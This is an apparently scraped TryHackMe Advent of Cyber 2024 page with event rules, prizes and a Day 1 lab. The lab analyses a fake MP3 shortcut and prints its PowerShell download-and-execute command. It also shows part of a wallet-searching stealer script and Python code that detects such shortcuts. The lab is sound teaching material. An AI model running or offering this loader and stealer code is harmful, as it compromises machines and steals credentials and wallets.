<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="2" name="2" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button><button color="hint" type="button" role="button" class="sc-kAyceB dtlBUx sc-beSSEr epJuEK"><svg
aria-hidden="true" focusable="false" data-prefix="far" data-icon="lightbulb" class="svg-inline--fa fa-lightbulb " role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512">
<path fill="currentColor"
d="M112.1 454.3c0 6.297 1.816 12.44 5.284 17.69l17.14 25.69c5.25 7.875 17.17 14.28 26.64 14.28h61.67c9.438 0 21.36-6.401 26.61-14.28l17.08-25.68c2.938-4.438 5.348-12.37 5.348-17.7L272 415.1h-160L112.1 454.3zM192 0C90.02 .3203 16 82.97 16 175.1c0 44.38 16.44 84.84 43.56 115.8c16.53 18.84 42.34 58.23 52.22 91.45c.0313 .25 .0938 .5166 .125 .7823h160.2c.0313-.2656 .0938-.5166 .125-.7823c9.875-33.22 35.69-72.61 52.22-91.45C351.6 260.8 368 220.4 368 175.1C368 78.8 289.2 .0039 192 0zM288.4 260.1c-15.66 17.85-35.04 46.3-49.05 75.89h-94.61c-14.01-29.59-33.39-58.04-49.04-75.88C75.24 236.8 64 206.1 64 175.1C64 113.3 112.1 48.25 191.1 48C262.6 48 320 105.4 320 175.1C320 206.1 308.8 236.8 288.4 260.1zM176 80C131.9 80 96 115.9 96 160c0 8.844 7.156 16 16 16S128 168.8 128 160c0-26.47 21.53-48 48-48c8.844 0 16-7.148 16-15.99S184.8 80 176 80z">
</path>
</svg>Hint</button></div>
</form>
Text Content
ADVENT OF CYBER 2024

Dive into the wonderful world of cyber security by engaging in festive beginner-friendly exercises every day in the lead-up to Christmas!

Difficulty: easy | Duration: 1440 min

Featured video: Advent of Cyber - Day 5: Exploiting XXE in Web Apps! (Source: YouTube)

Task 1 (Introduction): Welcome to Advent of Cyber 2024

WELCOME TO ADVENT OF CYBER 2024!

In this year’s Advent of Cyber, can you help McSkidy and the Glitch defend SOC-mas against the evil Mayor Malware’s plans? Dive into the wonderful world of cyber security by engaging in festive beginner-friendly exercises every day in the lead-up to Christmas!

Advent of Cyber is available to all TryHackMe users, and best of all, it's free to participate in. You’ll also be in with the chance of winning from this year’s huge $100,000 prize draw. The more questions you complete, the higher your chances of winning BIG! Think of it like an advent calendar, but with exciting (and festive) security challenges instead of chocolate.

MAIN PRIZES

This year is our biggest and best prize draw yet, with over $100,000 worth of prizes! In this event, the number of questions you answer really matters! For each question you answer correctly, you'll receive a raffle ticket. The more raffle tickets you collect, the higher your chances of winning big!

To be in with the chance of winning the grand prize of DEF CON tickets with accommodation, you’ll need to complete every task in this room by December 31st! This will also earn you a certificate of completion.
Here are the prizes up for grabs:

* 15x Samsung Monitor ($300.00)
* 7x GRID Backpack ($225.00)
* 20x JBL Headphones ($130.00)
* 15x Branded Cotton Canvas Backpack ($65.00)
* 4x Sony Headphones ($450.00)
* 3x PAC-MAN™ Deluxe Arcade Game ($500.00)
* 5x Desk Chair ($249.00)
* 20x Large Arlo Tech Organizer ($70.00)
* 20x The Sidekick Tech Kit ($50.00)
* 15x Branded Apple AirPods Pro (2nd Gen) ($300.00)
* 10x Apple TV 4K 64GB (3rd generation) ($149.00)
* 10x Personalized Catch:3 Classics, Italian Leather ($190.00)
* 15x Clutch® Pro USB-C for Android and iPhone 15+ ($50.00)
* 500x THM Subscription (1 Month) ($14.00)
* 5x Stilosa 15 Bar Pump Espresso Machine ($150.00)
* 300x THM Subscription (3 Months) ($42.00)
* 5x Infinity Game Board™ ($500.00)
* 25x THM Subscription (6 Months) ($84.00)
* 20x Branded MagSafe Charger ($45.00)
* 5x THM Subscription (12 Months) ($126.00)
* 5x Duo Standing Desk ($499.00)
* 400x TryHackMe Swag Gift Cards ($10.00)
* 10x Nintendo Switch 32GB Lite ($250.00)
* 300x TryHackMe Swag Gift Cards ($20.00)
* 3x Switch OLED Model w/ Neon Red & Neon Blue Joy-Con ($420.00)
* 150x TryHackMe Swag Gift Cards ($50.00)
* 10x Solar Charger and Emergency Radio ($50.00)
* 80x TryHackMe Swag Gift Cards ($75.00)
* 2x PlayStation VR2 ($600.00)
* 20x TryHackMe Swag Gift Cards ($100.00)
* 5x Beosound Explore Outdoor Bluetooth Speaker ($249.00)
* 200x Hacktivities Cards ($20.00)
* 10x Therabody SmartGoggles ($199.00)
* 5x DEF CON ($460.00)
* 10x Ornata V3 Full-Size Wired Mecha-Membrane Gaming Keyboard with Chroma RGB Backlighting ($79.00)
* GRAND PRIZE: 3x DEF CON + Accommodation ($1,500.00)

All winners will be chosen at random, verified by our team (no cheating allowed!), and announced on Monday, January 6th, 2025.
GENERAL RULES

Breaking any of the following rules will result in elimination from the event:

* .tryhackme.com and the OpenVPN server are off-limits to probing, scanning, or exploiting
* Users are only authorised to hack machines deployed in the rooms they have access to
* Users are not to target or attack other users
* Users should only enter the event once, using one account
* Answers to questions are not to be shared unless shown on videos/streams
* Cheating
* Usage of bot accounts

For the prize raffle terms and conditions, please visit this page.

Please note: Cheating is NOT allowed and will result in a disqualification from the Advent of Cyber event. All winners will be fully verified. This includes, in particular:

* creating puppet accounts to inflate your chance to win
* using bots to auto-complete the answers in the room

HOW TO QUALIFY

To qualify for the main prizes, you must answer questions in the Advent of Cyber 2024 challenges, starting with Day 1 (Task 7 of this room). Only questions answered in the Advent of Cyber 2024 room will qualify you for the raffle.

* It doesn't matter when you complete tasks. You just need to complete them by 31st December 2024. For example, if you complete questions from Day 1 on 31st December 2024, you will still receive the same number of raffle tickets as a user who completes them on the day of the task release!
* You don't have to complete all the questions or complete them in order. The more questions you answer, the more raffle tickets you get and the higher your chances of winning.
* Please visit this page to read the detailed Raffle Terms and Conditions.

IMPORTANT NOTE: The raffle tickets will not be visible on your profile. The number of raffle tickets you have always equals the number of questions you have answered in this room.

CERTIFICATE & BADGE

Finally, if you complete every task in the event, you will earn a certificate of completion and a badge!
As your name will be included on the certificate, we advise ensuring your full name is set (and updated) in your profile.

FEATURED VIDEOS

Each task released has a supporting video walkthrough to guide you through. You can expect to see some of your favourite cyber security video creators. The most recent day’s video will display at the top of the room, but all videos will be available within the relevant task content. This year's Advent of Cyber featured creators include 0day, UnixGuy, Gerald Auger, Tyler Ramsbey, Bearded I.T. Dad, Day Cyberwox, Marcus Hutchins, David Alves, InsiderPHD, Tib3rius, KevTech, Cyb3rMaddy, and more!

Answer the questions below

* I have read the rules and raffle Terms and Conditions.

Task 2 (Introduction): Join our community

JOIN OUR COMMUNITY

Follow us on social media for exclusive giveaways, Advent of Cyber task releases, and our prize draw announcement!

* Follow us on LinkedIn!
* Be a part of our community and join our Discord!
* Follow us on X to receive daily challenge posts!
* Join us on Instagram!
* Follow us on Facebook!
* Join our growing subreddit!
* Follow our TikToks!

JOIN OUR DISCORD

Discord is the heartbeat of the TryHackMe community. It's where we go to connect with fellow hackers, get help with difficult rooms, and find out when a new room launches. Our Discord server has over 220,000 members (and continues to grow every day), so there's always something happening.

Are you excited about Advent of Cyber? Visit a dedicated channel on our Discord, where you can chat with other participants in the event and follow the daily releases! If you haven't used it before, it's very easy to set up (we recommend installing the app). We'll ask a couple of onboarding questions to help figure out which channels are most relevant to you.

WHAT DO YOU GET WITH DISCORD?

There are so many benefits to joining:

* Discuss the day's Advent of Cyber challenges and receive support in a dedicated channel.
* Discover how to improve your job applications and fast-track your way into a cyber career.
* Learn about upcoming TryHackMe events and challenges.
* Browse discussion forums for all of our learning paths and releases.

Click on this link to join our Discord Server: Join the Community!

GRAB YOUR SWAG!

Want to rep swag from your favourite cyber security training platform? We have a NEW special edition Advent of Cyber swag, now available for order!

Answer the questions below

* Join our Discord and say hi!
* Is there a dedicated Advent of Cyber channel on TryHackMe Discord where users can discuss daily challenges and receive dedicated support? (yes/no)
* Follow us on LinkedIn!
* Follow us on X!
* Check out the subreddit!
* Join us on Instagram!
* Follow us on Facebook!
* Follow our TikToks!

Task 3 (Introduction): Completing Advent of Cyber as an organisation

COMPLETING ADVENT OF CYBER AS AN ORGANISATION

With TryHackMe for Business, you:

* Get full unlimited access to all of TryHackMe's content and features (excluding cloud content and SOC Sim)
* Leverage competitive learning and collectively engage your team in Advent of Cyber tasks, measuring their progress
* Create customised learning paths to dive into training topics based on Advent of Cyber and beyond
* Training for Defensive, Offensive, and Cloud Security teams
* Advanced admin reports and dashboards
* Implementation support for your organisation, SSO integration, and Customer Success Manager
* Build your own custom capture-the-flag events on demand!

If you're interested in exploring TryHackMe's business benefits through a FREE trial, please contact sales@tryhackme.com. For more information about our offering, check out the business page. If you’re an existing client and want to get your wider team and company involved, please reach out to your dedicated Customer Success Manager!
Answer the questions below

* Get your team to work on Advent of Cyber together!

Task 4 (Introduction): How to use TryHackMe

A SHORT TRYHACKME TUTORIAL

New tasks are released daily at 4pm GMT, with the first challenge being released on 1st December. They will vary in difficulty (although they will always be aimed at beginners). Each task in the event will include instructions on how to interact with the practical material. Please follow them carefully! The instructions will include a connection card similar to the one shown below:

Let's work our way through the different options.

If the AttackBox option is available:

TryHackMe's AttackBox is an Ubuntu Virtual Machine hosted in the cloud. Think of the AttackBox as your virtual computer, which you would use to conduct a security engagement. There will be multiple tasks during the event that will ask you to deploy the AttackBox. You can deploy the AttackBox by clicking the "Start AttackBox" button at the top of this page. Using the web-based AttackBox, you can complete exercises through your browser. If you're a regular user, you can deploy the AttackBox for free for 1 hour a day. If you're subscribed, you can deploy it for an unlimited amount of time!

Please note that you can use your own attacker machine instead of the AttackBox. In that case, you will need to connect using OpenVPN. Instructions on how to set up OpenVPN are here.

You can open the AttackBox full-screen view in a new tab using this button:

If the VM option is available:

Most tasks in Advent of Cyber will have a virtual machine attached to them. You will use some of them as targets to train your offensive security skills and some of them as hosts for your analysis and investigations. If this option is available, you need to click the "Start Machine" button. After the machine is deployed, you will see a frame appear at the top of the room.
It will display some important information, like the IP address of the target machine, as well as options to extend the machine's timer or terminate it.

If the split-screen option is available:

Some tasks will allow you to view your deployed VM in a split-screen view. Typically, if this option is enabled, the split screen will open automatically. If it doesn't, you can click this button at the top of the page for the split screen to open. Please note that you can open split-screen virtual machines in another tab using this button:

If there's a direct link available:

Some virtual machines allow you to view the necessary content directly in another tab on your browser. In this case, you'll be able to see a link to the virtual machine directly in the task content. Please note that for the link to work, you first need to deploy the virtual machine attached to the task.

If there is a direct connection option available:

Some tasks will allow you to connect to the attached virtual machines using RDP, SSH, or VNC. This is always optional, and virtual machines with this enabled will also be accessible via a split screen. In these cases, login credentials will be provided, like in the image below:

We provide this as some users might prefer to connect directly. However, please note that some tasks will deliberately have this option disabled. If no credentials are given, direct connection is not possible.

Answer the questions below

* Got it!

Task 5 (Introduction): How the Glitch Stole SOC-mas

HOW THE GLITCH STOLE SOC-MAS

The snow is falling on the tech town of Wareville, and all the different Ware families are gathering in the town square, getting ready for a town meeting. We see the Softwares and the Freewares, skating down the neon-lit frostlanes. We turn to Server Street, and see the Hardwares and the Firmwares marching downtown, festive server lights blinking and flickering in their eyes.

It’s time to start preparing for SOC-mas, the most joyous time of the year in the tech town of Wareville.

If we lift our eyes, we’ll see, beyond the buzzing city, a snow-covered mountain of discarded technology. Boulders of old printers, cracked monitor cliffs, and server rack ridges, held together by vines of ethernet cables, and a single old gaming chair at the peak - this is Mount Hackit, and no Wares dare to go there. They fear it not because of the frequent floppy disk avalanches; the Wares avoid Mount Hackit because of the Glitch.

The Glitch’s lair is hidden in a deep cave, and he’s there now. He grabs a few cables hanging from the ceiling and plugs them in. Although not as new and shiny as Wareville’s, his servers work just fine! The Glitch has been watching Wareville’s security for years, and this SOC-mas will not be different. The Wares might fear the Glitch, thinking he is an evil hacker, but it doesn’t matter. Cracking his fingers, he starts typing, establishing the connection to the town’s network. Time to hack!

Back in the town square, Marta May Ware, the SOC-mas organiser, is climbing up on the stage to address the town when all the lights suddenly flicker. All the Wares look around, confused, but it passes quickly, and everything returns to normal.

In the city hall, Mayor Malware slams his fists on his desk. “Blocked again!” he shouts angrily. “That insufferable Glitch is at it again!” The mayor’s plan to stop SOC-mas preparation by sabotaging tonight's meeting was unsuccessful. He’ll have to think of something better for tomorrow…

In the meantime, Wareville’s SOC is in chaos. Analysts are trying to discover what caused the sudden power surge that threatened all tech in the town. McSkidy Software, the town’s leading cyber security expert, points at a log file on the screen and exclaims, “Now, I don’t know exactly what happened, but this proves we had a connection from Mount Hackit!” McSkidy runs out of the SOC and heads up the mountain.
When she reaches the cave, she does not expect to see the Glitch waiting for her, two cups of hot cocoa in his hands and his dog curled up at his feet. It takes most of the evening, but the Glitch explains what he's been doing: protecting the town from Mayor Malware's evil plans. It looks like the mayor wants to completely stop SOC-mas from happening this year! The Glitch knows the Wares might mistrust or hate him, but he wants to help. Now, united by a common purpose, McSkidy and the Glitch start their work in the Mount Hackit cave, because they're the only ones standing between Wareville and chaos. Come back on December 1st to help McSkidy and the Glitch defend SOC-mas against the evil Mayor Malware's plans!

Task 6 (Introduction) Subscribe to TryHackMe with a 30% discount!

SUBSCRIBE WITH A DISCOUNT!
The Advent of Cyber event is completely free! However, we recommend checking out some of the reasons to subscribe. To celebrate Advent of Cyber, you can get 30% off personal annual subscriptions using the discount code AOC2024 at checkout. This discount is valid until 31st December 2024 at 23:59 GMT.

Task 7 (OPSEC) Day 1: Maybe SOC-mas music, he thought, doesn't come from a store?

Task includes a deployable machine.

The Story
McSkidy tapped keys with a confident grin,
A suspicious website, now where to begin?
She'd seen sites like this, full of code and of grime,
Shady domains, and breadcrumbs easy to find.

McSkidy's fingers flew across the keyboard, her eyes narrowing at the suspicious website on her screen. She had seen dozens of malware campaigns like this. This time, the trail led straight to someone who went by the name "Glitch." "Too easy," she muttered with a smirk.

"I still have time," she said, leaning closer to the screen. "Maybe there's more." Little did she know, beneath the surface lay something far more complex than a simple hacker's handle. This was just the beginning of a tangled web unravelling everything she thought she knew.

LEARNING OBJECTIVES
* Learn how to investigate malicious link files.
* Learn about OPSEC and OPSEC mistakes.
* Understand how to track and attribute digital identities in cyber investigations.

CONNECTING TO THE MACHINE
Before moving forward, review the questions in the connection card and start the virtual machine by pressing the Start Machine button. The VM should be fully loaded in 3 minutes. Additionally, you will need the AttackBox, which can be launched by clicking the Start AttackBox button at the top of the page.

NOTE: If you're clicking "Start Machine" and encountering an issue launching it, don't worry: it's just the high demand. What can you do?
* Keep trying! Machines become available as demand fluctuates.
* If you're still having trouble, come back a little later when it's less busy.

INVESTIGATING THE WEBSITE
The website we are investigating is a YouTube to MP3 converter currently being shared amongst the organisers of SOC-mas. You've decided to dig deeper after hearing some concerning reports about this website. From your AttackBox, access the website by visiting MACHINE_IP in the web browser. At first glance, the website looks legitimate and presentable. The About page even says that it was made by "The Glitch". How considerate of them to make our job easier! Scrolling down, you'll see the feature list, which promises to be "Secure" and "Safe." From our experience, that isn't very likely.

YOUTUBE TO MP3 CONVERTER WEBSITES
These websites have been around for a long time. They offer a convenient way to extract audio from YouTube videos, which makes them popular.
However, historically, these websites have been observed to carry significant risks, such as:
* Malvertising: Many sites contain malicious ads that can exploit vulnerabilities in a user's system, which could lead to infection.
* Phishing scams: Users can be tricked into providing personal or sensitive information via fake surveys or offers.
* Bundled malware: Some converters come with malware, tricking users into unknowingly running it.

What nefarious thing does this website have in store for us?

GETTING SOME TUNES
Let's find out by pasting any YouTube link in the search form and pressing the "Convert" button. Then select either the mp3 or mp4 option. This should download a file that we can use to investigate. For example, we can use https://www.youtube.com/watch?v=dQw4w9WgXcQ, a classic if you ask me. Once downloaded, navigate to your Downloads folder or, if you are using the AttackBox, to your /root/ directory. Locate the file named download.zip, right-click on it, and select Extract To. In the dialog window, click the Extract button to complete the extraction. You'll now see two extracted files: song.mp3 and somg.mp3.

To quickly determine each file's contents, double-click the "Terminal" icon on the desktop and run the file command on each one. The file command identifies a file by its leading bytes (its magic) rather than trusting the extension, which is exactly the check we need here. First, let's try song.mp3.

Check File 1 (Terminal)
user@tryhackme:~$ file song.mp3
song.mp3: Audio file with ID3 version 2.3.0, contains:MPEG ADTS, layer III, v1, 192 kbps, 44.1 kHz, Stereo

There doesn't seem to be anything suspicious, according to the output. As expected, this is just an MP3 file. How about the second file, somg.mp3? From the filename alone, we can tell something is not right. Still, let's confirm by running the file command on it anyway.
Check File 2 (Terminal)
user@tryhackme:~$ file somg.mp3
somg.mp3: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Archive, ctime=Sat Sep 15 07:14:14 2018, mtime=Sat Sep 15 07:14:14 2018, atime=Sat Sep 15 07:14:14 2018, length=448000, window=hide

Now, this is more interesting! The output tells us that instead of an MP3, the file is an "MS Windows shortcut", also known as a .lnk file. This file type is used in Windows to link to another file, folder, or application, and because a shortcut can carry its own command-line arguments, it can also be used to run commands. If you've ever seen the shortcuts on a Windows desktop, you already know what they are. One caveat worth remembering: Windows Explorer never displays the .lnk extension, even when it is set to show file extensions, so a shortcut can masquerade as a media file; that is what makes this file type a common phishing lure.

There are multiple ways to inspect .lnk files to reveal the embedded commands and attributes. For this room, however, we'll use ExifTool, which is already installed on this machine. To do this, go back to your Terminal and type:

Using ExifTool (Terminal)
user@tryhackme:~$ exiftool somg.mp3

Look through the output to locate the command the shortcut in somg.mp3 runs. If you scroll down through the output, you should see a PowerShell command:

...
Relative Path : ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Working Directory : C:\Windows\System32\WindowsPowerShell\v1.0
Command Line Arguments : -ep Bypass -nop -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/MM-WarevilleTHM/IS/refs/heads/main/IS.ps1','C:\ProgramData\s.ps1'); iex (Get-Content 'C:\ProgramData\s.ps1' -Raw)"
Machine ID : win-base-2019

What this PowerShell command does:
* The -ep Bypass -nop flags disable PowerShell's usual restrictions: -ep is short for -ExecutionPolicy, and Bypass lets scripts run regardless of the configured execution policy, while -nop (-NoProfile) skips loading the user's profile so nothing in it interferes with the run. -c (-Command) then supplies the command to execute. Note that the execution policy is not a security boundary; Bypass only removes a guardrail, it exploits nothing.
* The DownloadFile method of .NET's WebClient pulls a file (in this case, IS.ps1) from a remote server (https://raw.githubusercontent.com/MM-WarevilleTHM/IS/refs/heads/main/IS.ps1) and saves it as C:\ProgramData\s.ps1 on the target machine.
* Once downloaded, Get-Content reads the script and iex (Invoke-Expression) executes it, running the downloaded s.ps1 file.

If you view the contents of the file in your browser (https://raw.githubusercontent.com/MM-WarevilleTHM/IS/refs/heads/main/IS.ps1), you will see just how lucky we are that we are not currently using Windows.

PowerShell Script
    function Print-AsciiArt {
        Write-Host " ____ _ ___ _____ ___ _ _ "
        Write-Host " / ___| | | |_ _||_ _| / __| | | | |"
        Write-Host "| | _ | | | | | | | | | |_| |"
        Write-Host "| |_| | | |___ | | | | | |__ | _ |"
        Write-Host " \____| |_____| |___| |_| \___| |_| |_|"
        Write-Host " Created by the one and only M.M."
    }

    # Call the function to print the ASCII art
    Print-AsciiArt

    # Path for the info file
    $infoFilePath = "stolen_info.txt"

    # Function to search for wallet files
    function Search-ForWallets {
        $walletPaths = @(
            "$env:USERPROFILE\.bitcoin\wallet.dat",
            "$env:USERPROFILE\.ethereum\keystore\*",
            "$env:USERPROFILE\.monero\wallet",
            "$env:USERPROFILE\.dogecoin\wallet.dat"
        )
        Add-Content -Path $infoFilePath -Value "`n### Crypto Wallet Files ###"
        foreach ($path in $walletPaths) {
            if (Test-Path $path) {
                Add-Content -Path $infoFilePath -Value "Found wallet: $path"
            }
        }
    }
    [Output truncated for brevity]

The script is designed to collect highly sensitive information from the victim's system, such as cryptocurrency wallets and saved browser credentials, and send it to an attacker's remote server.

Disclaimer: All content in this room, including CPP code, PowerShell scripts, and commands, is provided solely for educational purposes. Please do not execute these on a Windows host.
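The two checks above, identifying the file by its leading bytes rather than its name and then pulling the target, working directory and arguments out of the shortcut, can be scripted. The following is an added example written for this edit, not code from the room: it classifies a buffer as MP3 or Shell Link by its magic bytes, walks the ShellLinkHeader and StringData sections of the MS-SHLLINK format the way exiftool does above, and flags the same command-line patterns the explanation calls out. Because it has to run offline, it also builds a constructed .lnk in memory whose relative path, working directory and arguments are copied from the exiftool output above; the flag constants and offsets come from the published MS-SHLLINK specification, and the indicator names are this example's own.

```python
import re
import struct
import uuid

# ShellLinkHeader layout and LinkFlags bits from MS-SHLLINK (section 2.1).
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = uuid.UUID("00021401-0000-0000-C000-000000000046").bytes_le
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
# ShowCommand values; 7 (SW_SHOWMINNOACTIVE) is what malicious shortcuts use
# to keep the console window out of the victim's sight.
SHOW_COMMANDS = {1: "SW_SHOWNORMAL", 3: "SW_SHOWMAXIMIZED", 7: "SW_SHOWMINNOACTIVE"}

# Fields reported by exiftool for somg.mp3 on this page, reused as sample data.
SAMPLE_RELPATH = r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_WORKDIR = r"C:\Windows\System32\WindowsPowerShell\v1.0"
SAMPLE_ARGS = ("-ep Bypass -nop -c \"(New-Object Net.WebClient).DownloadFile("
               "'https://raw.githubusercontent.com/MM-WarevilleTHM/IS/refs/heads/main/IS.ps1',"
               "'C:\\ProgramData\\s.ps1'); iex (Get-Content 'C:\\ProgramData\\s.ps1' -Raw)\"")


def identify(data: bytes) -> str:
    """Classify by leading bytes instead of trusting the extension (what `file` does)."""
    if data[:3] == b"ID3":
        return "mp3 (ID3v2 tag)"
    if len(data) >= 2 and data[0] == 0xFF and (data[1] & 0xE0) == 0xE0:
        return "mp3 (MPEG audio frame sync)"
    if len(data) >= 20 and data[:4] == b"\x4c\x00\x00\x00" and data[4:20] == LNK_CLSID:
        return "lnk (MS Windows shortcut)"
    return "unknown"


def parse_lnk(data: bytes) -> dict:
    """Walk header -> optional LinkTargetIDList -> optional LinkInfo -> StringData."""
    if identify(data) != "lnk (MS Windows shortcut)":
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_cmd = struct.unpack_from("<I", data, 60)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_IDLIST:                       # IDListSize (2 bytes) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:                     # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]

    def read_string() -> str:
        nonlocal pos
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no terminator
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        pos += count * width
        return raw.decode("utf-16-le" if width == 2 else "cp1252")

    parsed = {"show_command": SHOW_COMMANDS.get(show_cmd, hex(show_cmd))}
    for flag, key in ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"),
                      (HAS_WORKDIR, "working_dir"), (HAS_ARGS, "arguments"),
                      (HAS_ICON, "icon_location")):
        parsed[key] = read_string() if flags & flag else None
    return parsed


def suspicious_indicators(parsed: dict) -> list:
    """The patterns the explanation of the command line above calls out."""
    target = (parsed["relative_path"] or "").lower()
    args = parsed["arguments"] or ""
    checks = [
        ("target is powershell.exe", "powershell" in target),
        ("execution policy bypass (-ep Bypass)",
         re.search(r"-(?:ep|executionpolicy)\s+bypass", args, re.I)),
        ("profile disabled (-nop)", re.search(r"-nop(?:rofile)?\b", args, re.I)),
        ("remote download",
         re.search(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b", args, re.I)),
        ("in-memory execution (iex)", re.search(r"\biex\b|invoke-expression", args, re.I)),
        ("console window minimised", parsed["show_command"] == "SW_SHOWMINNOACTIVE"),
    ]
    return [name for name, hit in checks if hit]


def build_lnk(relative_path: str, working_dir: str, arguments: str, show_cmd: int = 7) -> bytes:
    """Constructed sample: a minimal Unicode .lnk with an ID list, for offline testing."""
    flags = HAS_IDLIST | HAS_RELPATH | HAS_WORKDIR | HAS_ARGS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_cmd, 0, 0, 0, 0)
    idlist = struct.pack("<H", 4) + b"\x1f\x00" + b"\x00\x00"   # one ItemID + TerminalID
    body = struct.pack("<H", len(idlist)) + idlist
    for s in (relative_path, working_dir, arguments):
        body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + body


if __name__ == "__main__":
    sample = build_lnk(SAMPLE_RELPATH, SAMPLE_WORKDIR, SAMPLE_ARGS)
    print(identify(b"ID3\x03\x00"), "|", identify(sample))
    info = parse_lnk(sample)
    for key, value in info.items():
        print(f"{key:>14}: {value}")
    print("indicators:", suspicious_indicators(info))
```

The parser deliberately stops at StringData: the ExtraData blocks that follow (where the "Machine ID" exiftool prints lives) are skipped, and a real sample should still be checked with exiftool or a full LNK parser. The magic-byte check is the point of the first half: a byte sequence starting with 4C 00 00 00 followed by the Shell Link CLSID is a shortcut no matter what the name says.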
This looks fairly typical of a PowerShell script for such a purpose, with one notable exception: a signature in the code that reads:

> Created by the one and only M.M.

SEARCHING THE SOURCE
There are many paths we could take to continue our investigation. We could investigate the website further, analyse its source code, or search for open directories that might reveal more information about the malicious actor's setup. We could search for the file's hash or the script's signature on public malware databases like VirusTotal or Any.Run. Each of these methods could yield useful clues. However, for this room, we'll try something a bit different. Since we already have the PowerShell code, searching for it online might give us useful leads. It's a long shot, but we'll explore it in this exercise.

There are many places where we can search for code. The most widely used is GitHub, so let's try searching there. To search effectively, we look for unique parts of the code: the more distinctive, the better. For this scenario, we have the string we uncovered before: "Created by the one and only M.M."

Search for this on GitHub.com or go directly to this link: https://github.com/search?q=%22Created+by+the+one+and+only+M.M.%22&type=issues

You'll notice something interesting if you explore the pages in the search results.

NOTE: If you receive an error, it's because GitHub rate-limits searches from users who are not signed in. To fix this, sign in with a GitHub account or skip directly to the next step by going here: https://github.com/Bloatware-WarevilleTHM/CryptoWallet-Search/issues/1

If you look through the search results, you will be able to infer the malicious actor's identity from the information on the project's page and in the GitHub Issues section. Aha! Looks like this user has made a critical mistake.

INTRODUCTION TO OPSEC
This is a classic case of OPSEC failure.
Operational Security (OPSEC) is a term originally coined in the military for the process of protecting sensitive information and operations from adversaries. The goal is to identify and eliminate the leaks that would let an adversary piece together who you are and what you are doing, before they can be exploited. In the context of cyber security, when malicious actors fail to follow proper OPSEC practices, they may leave digital traces that can be pieced together to reveal their identity. Some common OPSEC mistakes include:
* Reusing usernames, email addresses, or account handles across multiple platforms. One might assume that anyone trying to cover their tracks would remove such obvious and incriminating information, but sometimes vanity or simple forgetfulness gets in the way.
* Leaving identifiable metadata in code, documents, or images, which may reveal personal information like device names, GPS coordinates, or timestamps.
* Posting publicly on forums or GitHub (as in this scenario) with details that tie back to their real identity or reveal their location or habits.
* Failing to use a VPN or proxy while conducting malicious activities, which allows law enforcement to track their real IP address.

You'd think that someone doing something bad would make OPSEC their top priority, but they're only human and can make mistakes, too. For example, here are some real-world OPSEC mistakes that led to some really big fails:

ALPHABAY ADMIN TAKEDOWN
One of the most spectacular OPSEC failures involved Alexandre Cazes, the administrator of AlphaBay, one of the largest dark web marketplaces:
* Cazes used the email address "pimp_alex_91@hotmail.com" in early welcome emails from the site.
* This email included his year of birth and other identifying information.
* He cashed out using a Bitcoin account tied to his real name.
* Cazes reused the username "Alpha02" across multiple platforms, linking his dark web identity to forum posts under his real name.
CHINESE MILITARY HACKING GROUP (APT1)
There's also the notorious Chinese hacking group APT1, which made several OPSEC blunders:
* One member, Wang Dong, signed his malware code with the nickname "Ugly Gorilla".
* This nickname was linked to programming forum posts associated with his real name.
* The group used predictable naming conventions for users, code, and passwords.
* Their activity consistently aligned with Beijing business hours, making their location obvious.

These failures provided enough information for cyber security researchers and law enforcement to publicly identify group members.

UNCOVERING MM
If you've thoroughly investigated the GitHub search results, you should have uncovered several clues left by the malicious actor's poor OPSEC practices. We know the attacker left a distinctive signature in the PowerShell code (MM). This allowed us to search for related repositories and issues pages on GitHub. We then discovered an Issues page where the attacker engaged in discussions, providing more context and linking their activity to other projects. In this discussion, they responded to a query about modifying the code. This response, paired with their unique handle, was another critical slip-up, leaving behind a trail of evidence that can be traced back to them. By analysing the timestamps, usernames, and the nature of their interactions, we can now attribute the mastermind behind the attack to MM.

WHAT'S NEXT?
McSkidy dug deeper, her mind sharp and quick,
But something felt off, a peculiar trick.
The pieces she'd gathered just didn't align,
A puzzle with gaps, a tangled design.

As McSkidy continued digging, a pattern emerged that didn't fit the persona she was piecing together. A different handle appeared in obscure places, buried deep in the details: "MM." "Who's MM?" McSkidy muttered, the mystery deepening.
Even though all signs on the website seemed to point to Glitch as the author, it became clear that someone had gone to great lengths to ensure Glitch's name appeared everywhere. Yet the scattered traces left by MM suggested a deliberate effort to shift the blame.

Answer the questions below
* Looks like the song.mp3 file is not what we expected! Run "exiftool song.mp3" in your terminal to find out the author of the song. Who is the author?
* The malicious PowerShell script sends stolen info to a C2 server. What is the URL of this C2 server?
* Who is M.M? Maybe his GitHub profile page would provide clues?
* What is the number of commits on the GitHub repo where the issue was raised?
* If you enjoyed this task, feel free to check out the OPSEC room!
